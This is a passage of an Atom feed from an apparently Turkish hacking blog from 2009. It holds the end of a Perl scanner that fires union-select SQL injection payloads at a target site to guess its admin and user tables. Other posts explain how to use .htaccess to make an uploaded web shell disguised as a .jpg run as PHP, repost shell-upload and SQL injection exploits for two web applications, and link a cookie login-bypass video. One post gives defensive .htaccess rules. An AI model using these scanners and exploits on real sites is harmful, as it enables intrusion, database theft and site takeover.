/&gt;'+union+select+0+from+uthorization',&lt;br /&gt;'+union+select+0+from+membros',&lt;br /&gt;'+union+select+0+from+utilizadores',&lt;br /&gt;'+union+select+0+from+staff',&lt;br /&gt;'+union+select+0+from+nuke_authors',&lt;br /&gt;'+union+select+0+from+accounts',&lt;br /&gt;'+union+select+0+from+account',&lt;br /&gt;'+union+select+0+from+accnts',&lt;br /&gt;'+union+select+0+from+associated',&lt;br /&gt;'+union+select+0+from+accnt',&lt;br /&gt;'+union+select+0+from+customers',&lt;br /&gt;'+union+select+0+from+customer',&lt;br /&gt;'+union+select+0+from+membres',&lt;br /&gt;'+union+select+0+from+administrateur',&lt;br /&gt;'+union+select+0+from+utilisateur',&lt;br /&gt;'+union+select+0+from+tusertusers',&lt;br /&gt;'+union+select+0+from+utilisateurs',&lt;br /&gt;'+union+select+0+from+password',&lt;br /&gt;'+union+select+0+from+amministratore',&lt;br /&gt;'+union+select+0+from+god',&lt;br /&gt;'+union+select+0+from+God',&lt;br /&gt;'+union+select+0+from+authors',&lt;br /&gt;'+union+select+0+from+asociado',&lt;br /&gt;'+union+select+0+from+asociados',&lt;br /&gt;'+union+select+0+from+autores',&lt;br /&gt;'+union+select+0+from+membername',&lt;br /&gt;'+union+select+0+from+autor',&lt;br /&gt;'+union+select+0+from+autores',&lt;br /&gt;'+union+select+0+from+Users',&lt;br /&gt;'+union+select+0+from+Admin',&lt;br /&gt;'+union+select+0+from+Members',&lt;br /&gt;'+union+select+0+from+Miembros',&lt;br /&gt;'+union+select+0+from+Usuario',&lt;br /&gt;'+union+select+0+from+Usuarios',&lt;br /&gt;'+union+select+0+from+ADMIN',&lt;br /&gt;'+union+select+0+from+USERS',&lt;br /&gt;'+union+select+0+from+USER',&lt;br /&gt;'+union+select+0+from+MEMBER',&lt;br /&gt;'+union+select+0+from+MEMBERS',&lt;br /&gt;'+union+select+0+from+USUARIO',&lt;br /&gt;'+union+select+0+from+USUARIOS',&lt;br /&gt;'+union+select+0+from+MIEMBROS',&lt;br /&gt;'+union+select+0+from+MIEMBRO');&lt;br /&gt;&lt;br /&gt;print "\Tablolar Araniyoooo... Bulunan tablolar asagida listelenecektir....\n\n";&lt;br /&gt;&lt;br /&gt;foreach $scan(@tab){&lt;br /&gt;&lt;br /&gt;my $url = $site.$scan;&lt;br /&gt;my $ua = LWP::UserAgent-&gt;new();&lt;br /&gt;my $req = HTTP::Request-&gt;new(GET=&gt;$url);&lt;br /&gt;my $resultado = $ua-&gt;request($req);&lt;br /&gt;&lt;br /&gt;if ($resultado-&gt;content =~ /The number of columns in the two selected tables or queries of a union query do not match./)&lt;br /&gt;{&lt;br /&gt;print "$url\n";&lt;br /&gt;open(a, "&gt;&gt;Union_ASP.txt");&lt;br /&gt;print a "$url\n";&lt;br /&gt;close(a);&lt;br /&gt;}}&lt;br /&gt;print "\Bulunan tablolar masaustune  Union_ASP.txt olarak kaydedildi.\n";&lt;br /&gt;print "\masaustunden ulasabilirsiniz bulunan tablolarin listelerine\n";&lt;br /&gt;&lt;stdin&gt;;&lt;br /&gt;}&lt;span style="color: rgb(255, 0, 0);"&gt; &lt;/span&gt;&lt;/stdin&gt;&lt;/stdin&gt;&lt;/stdin&gt;&lt;/stdin&gt;&lt;/stdin&gt;&lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/323640432528450619-2258463730332689186?l=eskit0prak.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eskit0prak.blogspot.com/feeds/2258463730332689186/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/sql-injection-php-and-asp-tablo-bulucu.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/2258463730332689186'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/2258463730332689186'/><link rel='alternate' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/sql-injection-php-and-asp-tablo-bulucu.html' title='Sql İnjection Php And Asp Tablo Bulucu [ Perl ]'/><author><name>LiveCoder</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-323640432528450619.post-5987194075918906889</id><published>2009-05-18T08:22:00.001-07:00</published><updated>2009-05-21T05:48:17.107-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>htaccess ile biraz güvenlik</title><content type='html'>&lt;div style="padding: 8px; width: 655px; overflow-x: auto; overflow-y: visible; margin-bottom: 8px;"&gt; Bugun htaccess ile ilgilendim. İnternetten htaccess kullanılısı vs vs birşeyler okudum&lt;br /&gt;ve guvenlik icin kullanabilecegimiz 3 5 kod toparladım.Zaten biliyor olabilirsiniz&lt;br /&gt;belkide yeni goreceksiniz.&lt;br /&gt;&lt;br /&gt;Dizin'e webden erişimi engellemek&lt;br /&gt;Web siteniz var ve icindeki klasorleri sadece icinden birşeyler cekmek include etmek&lt;br /&gt;frame kullanmak icin açtınız.&lt;br /&gt;Kod: Attıgınız dizine webden girişi engeller&lt;br /&gt;&lt;pre class="code"&gt;    Order Deny, Allow&lt;br /&gt;Deny from all&lt;/pre&gt;&lt;br /&gt;.htaccess goruntuleme engelleme&lt;br /&gt;Zaten apache bu olayı kendi icinde halletmiş.ama&lt;br /&gt;Kod:&lt;br /&gt;&lt;pre class="code"&gt;   &lt;files&gt;&lt;br /&gt;  Order Allow, Deny&lt;br /&gt;  Deny from all&lt;br /&gt;&lt;/files&gt;&lt;/pre&gt;&lt;br /&gt;Dosya tiplerinin cagırılmasını engellemek:&lt;br /&gt;Ornek olarak otomatik backup alan populer scriptlerin backup klasoru ve backup dosyasının olusma kombinasyonu biilindigi zaman yedeklerinize erişilinebilir.&lt;br /&gt;Kod: inc|txt|sql|ini dosyalarını cagırmayı engeller.&lt;br /&gt;&lt;pre class="code"&gt;&lt;filesmatch&gt;&lt;br /&gt;  Deny from all&lt;br /&gt;&lt;/filesmatch&gt;&lt;/pre&gt; Dosya formatlarını cogaltabilirsiniz  &lt;pre class="code"&gt;inc|txt|sql|ini&lt;/pre&gt; yerine zip rar  jpg vs vs. ekleyip cıkartabilirsiniz.&lt;br /&gt;İzin verilen domain ile paylasım:&lt;br /&gt;Download siteniz var ve dosyalarınz rar zip ten olusuyor ve kendi serveriniz da&lt;br /&gt;Kod: Sadece istediginiz ip veya domain den girildiginizde dosyanız calısmaya başlar.inmeye başlar.&lt;br /&gt;&lt;pre class="code"&gt;&lt;filesmatch&gt;&lt;br /&gt;Deny from all&lt;br /&gt;Allow from ip yada domain&lt;br /&gt;&lt;/filesmatch&gt;&lt;/pre&gt;&lt;br /&gt;Hotlink Korumak&lt;br /&gt;Diger sitelerde kendi sitenizde host edilen resim mp3 vs vs dosyaların direk link ile baska sitelerden erisilmesini istemiyorsanız&lt;br /&gt;Kod:Domain kendi domaininiz. ve dogru dizin yolunu yazmayı unutmayın. yani dosyalar nerde ise.&lt;br /&gt;&lt;pre class="code"&gt;   Options +FollowSymLinks&lt;br /&gt;RewriteEngine On&lt;br /&gt;RewriteCond %{HTTP_REFERER} .&lt;br /&gt;RewriteCond %{HTTP_REFERER} !^http://(www\.)?domain\.com(/.*)?$ [NC]&lt;br /&gt;RewriteRule \.(gif|jpe?g|bmp|png)$ - [F,L]&lt;/pre&gt;&lt;br /&gt;htaccess ile biraz daha işimiz var bakalım neler cıkacak.   &lt;/div&gt;         &lt;center&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/323640432528450619-5987194075918906889?l=eskit0prak.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eskit0prak.blogspot.com/feeds/5987194075918906889/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/htaccess-ile-biraz-guvenlik.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/5987194075918906889'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/5987194075918906889'/><link rel='alternate' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/htaccess-ile-biraz-guvenlik.html' title='htaccess ile biraz güvenlik'/><author><name>LiveCoder</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-323640432528450619.post-4457908057338940422</id><published>2009-05-18T08:21:00.000-07:00</published><updated>2009-05-21T05:47:59.195-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>htaccess ile jpg/gif i .php olarak calıstırma.</title><content type='html'>Evet blogseverler .htaccess in apache uzerindeki bitmek tukenmek&lt;br /&gt;bilmeyen nimetlerinden birtanesini daha sizinle paylasayım dedim.&lt;br /&gt;&lt;br /&gt;Resim galerilerinde vsvs. paneline giriş yaptıgınız yada&lt;br /&gt;resim dosyası yukleme alanına eriştiginiz sitelerde php.jpg&lt;br /&gt;yaptıgınız shell inizn binary/text şeklinde calısması cok sıkıcı bir&lt;br /&gt;durumdur. htaccess ile bu sorunu her serverda olmasada aşabiliriz.&lt;br /&gt;&lt;br /&gt;asagıdaki kod php4 icin  ordaki 4 u 5 yaparsanız php 5 icin:D o&lt;br /&gt;lmus olur    dosyayı .htaccess olarak kaydedin.&lt;br /&gt;&lt;br /&gt;&lt;pre class="code"&gt;&lt;files&gt;&lt;br /&gt; ForceType application/x-httpd-php4&lt;br /&gt;&lt;/files&gt;&lt;/pre&gt;&lt;br /&gt;Genelde coderlar upload kısmında htaccess i engellemezler&lt;br /&gt;yani akıllarına gelmez cunku panele benden baska kimse girmez&lt;br /&gt;diye dusunurler hep o yuzden .htaccess i atmakta sıkıntı çekeceginizi sanmam&lt;br /&gt;htaccess i attıktan sonra  shell i jpg  olark kaydedin   ve upload edin&lt;br /&gt;&lt;a class="external" target="_blank" href="http://site.com/nereyeatt%C4%B1nsa/shell.jpg"&gt;http://site.com/nereyeattınsa/shell.jpg&lt;/a&gt;  olarak calıstırın. Kolay gelsin.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/323640432528450619-4457908057338940422?l=eskit0prak.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eskit0prak.blogspot.com/feeds/4457908057338940422/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/htaccess-ile-jpggif-i-php-olarak.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/4457908057338940422'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/4457908057338940422'/><link rel='alternate' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/htaccess-ile-jpggif-i-php-olarak.html' title='htaccess ile jpg/gif i .php olarak calıstırma.'/><author><name>LiveCoder</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-323640432528450619.post-6617425811792640274</id><published>2009-05-18T08:03:00.000-07:00</published><updated>2009-05-21T05:47:44.940-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>Seditio CMS Sql İnjection</title><content type='html'>&lt;blockquote&gt;&lt;/blockquote&gt;&lt;pre class="code"&gt;milw0rm da bugun yayınlanmış 2 adet bug. biri sql injection biri file upload.&lt;br /&gt;Studio Lounge Address Book 2.5&lt;br /&gt;Address Book 2.5 (profile) Remote Shell Upload Vulnerability&lt;br /&gt;bug found by Jose Luis Gongora Fernandez (a.k.a) JosS&lt;br /&gt;&lt;br /&gt;- download: &lt;a class="external" target="_blank" href="http://www.studiolounge.net/2007/08/17/address-book-25"&gt;http://www.studiolounge.net/2007/08/17/address-book-25&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;- etkilenen dosya: upload-file.php&lt;br /&gt;&lt;br /&gt;bu dosya yuklenen dosyanın turune onem vermiyor.&lt;br /&gt;&lt;br /&gt;~ [EXPLOITING]&lt;br /&gt;&lt;br /&gt;1) /index2.php?title=add (shell upload edebilirsin, mesela c99 shell)&lt;br /&gt;2) Upload ettikten sonra "View Full Information"(detay sayfasına git)&lt;br /&gt;(ornek: index2.php?title=fullview&amp;amp;id=150)&lt;br /&gt;3) kaynak kodunu goreceksin "profiles/imagethumb.php?s="&lt;br /&gt;(ornek: profiles/imagethumb.php?s=57b7b72739c79f02d990c4239c4169b9.php)&lt;br /&gt;&lt;br /&gt;4) shell adresi: &lt;a class="external" target="_blank" href="http://target/profiles/57b7b72739c79f02d990c4239c4169b9.php"&gt;http://target/profiles/57b7b72739c79f02d990c4239c4169b9.php&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Seditio CMS Events Plugin&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Exploit&lt;br /&gt;&lt;br /&gt;http://[site]/[path]/plug.php?e=events&amp;amp;f=old&amp;amp;c=all' [SQL]/*&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;sed. tablolarını bilmedigim icin bugger in verdigi sorguyu yazdım gerisi size kalmış.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ornek kullanım :plug.php?e=events&amp;amp;f=old&amp;amp;c=all' union select 1,2,3,4,5,version(),7,8,9,0,1,2,3/*&lt;a class="external" target="_blank" href="http://target/profiles/57b7b72739c79f02d990c4239c4169b9.php"&gt;&lt;/a&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/323640432528450619-6617425811792640274?l=eskit0prak.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eskit0prak.blogspot.com/feeds/6617425811792640274/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/seditio-cms-sql-injection.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/6617425811792640274'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/6617425811792640274'/><link rel='alternate' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/seditio-cms-sql-injection.html' title='Seditio CMS Sql İnjection'/><author><name>LiveCoder</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-323640432528450619.post-1888474159162720051</id><published>2009-05-18T08:01:00.000-07:00</published><updated>2009-05-21T05:47:27.959-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>Cookie İnjection. Login Bypass</title><content type='html'>Tamamen dumenci'ye Ait Bir Videodur. İstedigimiz Yere Şifresiz Girebiliyoruz&lt;br /&gt;Cookiede Biraz Oynayarak. Sağolsun dumenci video çekerek anlatmış&lt;br /&gt;bu script CW'nin eShop Scriptidir cyber-security'nin referanslar bölümünden bulabilirsiniz&lt;br /&gt;işte link gerisi size kalmış ;&lt;br /&gt;&lt;br /&gt;&lt;a class="external" target="_blank" href="http://www.upload.gen.tr/d.php/s5/smxchbc3/baba.rar.html"&gt;http://www.upload.gen.tr/d.php/s5/smxchbc3/baba.rar.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/323640432528450619-1888474159162720051?l=eskit0prak.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eskit0prak.blogspot.com/feeds/1888474159162720051/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/cookie-injection-login-bypass.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/1888474159162720051'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/1888474159162720051'/><link rel='alternate' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/cookie-injection-login-bypass.html' title='Cookie İnjection. Login Bypass'/><author><name>LiveCoder</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-323640432528450619.post-5275869378493345785</id><published>2009-05-18T07:49:00.000-07:00</published><updated>2009-05-21T05:47:00.256-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Güncel'/><title type='text'>Blog online</title><content type='html'>Düşündüm Taşındım En Sonunda blogspot Açmaya Karar Verdim&lt;br /&gt;blog temasıda buldum inşallah hayırlı olur&lt;br /&gt;hadi yolumuza bakalım selametle&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/323640432528450619-5275869378493345785?l=eskit0prak.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eskit0prak.blogspot.com/feeds/5275869378493345785/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/blog-online.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/5275869378493345785'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/323640432528450619/posts/default/5275869378493345785'/><link rel='alternate' type='text/html' href='http://eskit0prak.blogspot.com/2009/05/blog-online.html' title='Blog online'/><author><name>LiveCoder</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
